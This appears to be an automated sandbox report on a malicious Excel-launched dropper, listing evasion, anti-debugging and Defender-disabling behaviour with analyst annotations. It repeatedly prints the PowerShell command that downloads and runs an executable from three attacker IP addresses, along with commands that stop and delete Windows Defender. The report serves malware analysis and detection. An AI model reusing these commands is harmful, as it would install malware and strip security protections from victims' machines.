Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (61 identical entries)
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exe | Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (45 identical entries)
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Process information set: NOOPENFILEERRORBOX (4 identical entries)
SEM_NOOPENFILEERRORBOX is set routinely by Office, cmd.exe and the PowerShell host in normal operation, so the bulk of these entries are low-signal; only the ones attributed to tmp0251.exe and tmp0261.exe come from code the sample dropped.

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking computer name)
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Evasive API call chain: GetComputerName, DecisionNodes, Sleep (graph 20-10917)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Evasive API call chain: GetPEB, DecisionNodes, Sleep (graph 18-10439)
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004BD12E rdtsc
Contains functionality to query network adapter information
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004B6B9D Sleep, GetAdaptersInfo, GetAdaptersInfo
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_00E16B9D Sleep, GetAdaptersInfo, GetAdaptersInfo
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (3 identical entries)
The value 922337203685477 is the integer part of TimeSpan.MaxValue expressed in milliseconds (2^63 ticks of 100 ns), i.e. a wait with no timeout inside the PowerShell host itself. The dropper script contains no Start-Sleep, so these entries and the matching "Thread sleep time" entries below are host noise rather than a deliberate delay by the sample; the sleep loops attributed to tmp0261.exe are the ones that matter.
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
Found evasive API chain checking for process token information
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Check user administrative privileges: GetTokenInformation, DecisionNodes (graph 18-10197)
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3220 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3296 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3664 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe TID: 3504 | Thread sleep count: 299 > 30
Source: C:\Windows\System32\taskeng.exe TID: 3708 | Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe TID: 3720 | Thread sleep count: 300 > 30
taskeng.exe is the Windows Task Scheduler engine, not a process the sample created; its entry would be attributable to the sample only if a scheduled task had been registered, which this section does not show.
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Last function: Thread delayed
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004C31F8 GetFullPathNameW, PathAddBackslashW, FindFirstFileW, FindNextFileW, GetLastError, FindClose
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004C22DE FindFirstFileW, FindNextFileW, FindClose
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004C1368 SHGetFolderPathW, FindFirstFileW, lstrcmpiW, lstrcmpiW, lstrcmpiW, Sleep, FindNextFileW, FindClose
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_00E231F8 GetFullPathNameW, PathAddBackslashW, FindFirstFileW, FindNextFileW, GetLastError, FindClose
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_00E222DE FindFirstFileW, FindNextFileW, FindClose
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_00E21368 SHGetFolderPathW, FindFirstFileW, lstrcmpiW, lstrcmpiW, lstrcmpiW, Sleep, FindNextFileW, FindClose
Contains functionality to query system information
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004B59E0 GetVersionExW, GetNativeSystemInfo, GetSystemInfo
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: powershell.exe, 00000004.00000002.2029109285.002B0000.00000004.sdmp | Binary or memory string: :vmbusres.dll
Source: powershell.exe, 00000007.00000002.2086911352.044C0000.00000004.sdmp | Binary or memory string: vmbusres.dllxx
Both strings were found in powershell.exe memory, not in the dropped binaries; vmbusres.dll is the Hyper-V VMBus resource library present in the analysis guest, and the dropper script performs no VM check, so this is an environment artifact rather than evidence of VM detection by the sample. The real evasion surface is in tmp0261.exe: computer-name and PEB checks feeding decision nodes, rdtsc timing, adapter enumeration, a token check for administrative rights, and sleep loops that outlasted the analysis window.
Source: powershell.exe, 00000007.00000002.2058752437.00159000.00000004.sdmpBinary or memory string: vmbusres.dll
Program exit pointsShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeAPI call chain: ExitProcess graph end nodegraph_18-13099
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeAPI call chain: ExitProcess graph end nodegraph_20-13126
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeAPI call chain: ExitProcess graph end nodegraph_20-10411
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | System information queried: KernelDebuggerInformation
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004BD12E rdtsc
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004B6105 LdrLoadDll
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004BA298 LoadLibraryW,GetProcAddress
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_0043C040 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_0043C076 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_0043C2E6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004C0330 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_0043C040 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_0043C076 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_0043C2E6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_00E20330 mov eax, dword ptr fs:[00000030h]
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004B1918 GetProcessHeap,RtlReAllocateHeap,RtlAllocateHeap
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Contains functionality to register its own exception handler
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_00401000 SetUnhandledExceptionFilter,__getmainargs,_iob,_setmode,_setmode,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,signal,signal,signal,signal,signal,signal
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_00401000 SetUnhandledExceptionFilter,__getmainargs,_iob,_setmode,_setmode,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,signal,signal,signal,signal,signal,signal
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Disables Windows Defender (deletes autostart)
Source: unknown | Process created: C:\Windows\System32\cmd.exe /c sc stop WinDefend
Source: unknown | Process created: C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exe | Process created: C:\Windows\System32\cmd.exe /c sc stop WinDefend
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exe | Process created: C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
Encrypted powershell cmdline option found
Source: unknown | Process created: Base64 decoded j"z%,zA/P)6hjTf5q,KDKiZ.7Mxmpwhrbu
Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded j"z%,zA/P)6hjTf5q,KDKiZ.7Mxmpwhrbu
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Base64 decoded j"z%,zA/P)6hjTf5q,KDKiZ.7Mxmpwhrbu
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' '
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\tmp0251.exe 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exe | Process created: C:\Windows\System32\cmd.exe /c sc stop WinDefend
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exe | Process created: C:\Windows\System32\cmd.exe /c sc delete WinDefend
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exe | Process created: C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exe | Process created: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WinDefend
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc delete WinDefend
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe 'C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''%tmp%\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''%tmp%\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath %tmp%\tmp6014.bat; start-process '%tmp%\tmp6014.bat' -windowstyle hidden'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''%tmp%\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''%tmp%\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath %tmp%\tmp6014.bat; start-process '%tmp%\tmp6014.bat' -windowstyle hidden'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;
Contains functionality to create a new security descriptor
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004B5CA7 AllocateAndInitializeSid,LookupAccountSidW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,FreeSid,CloseHandle

Language, Device and Operating System Detection:

Queries the installation date of Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Queries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004B5CA7 AllocateAndInitializeSid,LookupAccountSidW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,FreeSid,CloseHandle
Contains functionality to query the account / user name
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004B3AB5 GetUserNameW
Contains functionality to query windows version
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004BE515 GetVersionExW
Queries the cryptographic machine GUID
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Behavior Graph ID: 102806 (graph image not reproduced here; legend categories: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious)